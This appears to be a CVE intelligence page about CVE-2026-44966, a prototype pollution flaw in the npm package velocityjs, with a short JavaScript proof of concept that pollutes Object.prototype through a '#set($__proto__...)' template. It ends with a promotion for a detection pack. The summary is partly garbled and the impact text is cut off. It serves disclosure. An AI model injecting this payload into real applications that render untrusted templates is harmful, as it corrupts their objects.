HomeCVE Intelligence › CVE-2026-44966
CVSS 8.3 HIGH Vulnerability

CVE-2026-44966: Velocity.js has a Prototype Pollution vulnerability through #set path assignment

Summary A prototype pollution vulnerability was discovered in Velocity.js )[key] = val. Because there is no validation or filtering to block sensitive keys such as \_\_proto\_\_, constructor, or prototype, an attacker c…

8.3CVSS Score
HIGHSeverity
NOCISA KEV
VulnerabilityImpact Type

📋 Vulnerability Details

CVE IDCVE-2026-44966
Vendornpm
Affected Productvelocityjs
Vulnerability TypeVulnerability
CVSS Score8.3 (HIGH)
Actively Exploited❌ No known exploitation
Patch StatusSee Vendor Advisory →
Reported ByCYBERDUDEBIVASH SENTINEL APEX Intelligence (via github_advisories)

🔬 Technical Analysis

#

Summary

A prototype pollution vulnerability was discovered in Velocity.js )[key] = val. Because there is no validation or filtering to block sensitive keys such as \_\_proto\_\_, constructor, or prototype, an attacker can traverse the prototype chain and pollute the global Object.prototype.

PoC

`javascript const {render} = require('velocityjs'); delete Object.prototype.polluted; console.log({}.polluted); // "" render('#set($__proto__.polluted = "hacked")', {}); console.log({}.polluted); // "hacked" delete Object.prototype.polluted; ``

Impact

• Vulnerability Type: Prototype Pollution
• Who is impacted: Any application that renders Velocity templates where the template content can be influenced or controlled by untrusted users.
• Severity: High. Prototype pollution can often

📚 Advisory References

⚡ DETECTION RULES AVAILABLE

Get CVE-2026-44966 Detection Pack

Sigma rules, YARA signatures, IOC table, and SIEM queries for Splunk, Elastic, Sentinel, and Chronicle — deployable in 5 minutes.

✓ Sigma Rules ✓ YARA Pack ✓ IOC Table ✓ SIEM Queries
🛡️ Get Detection Pack → 🔌 Access via API →

🔗 Related Intelligence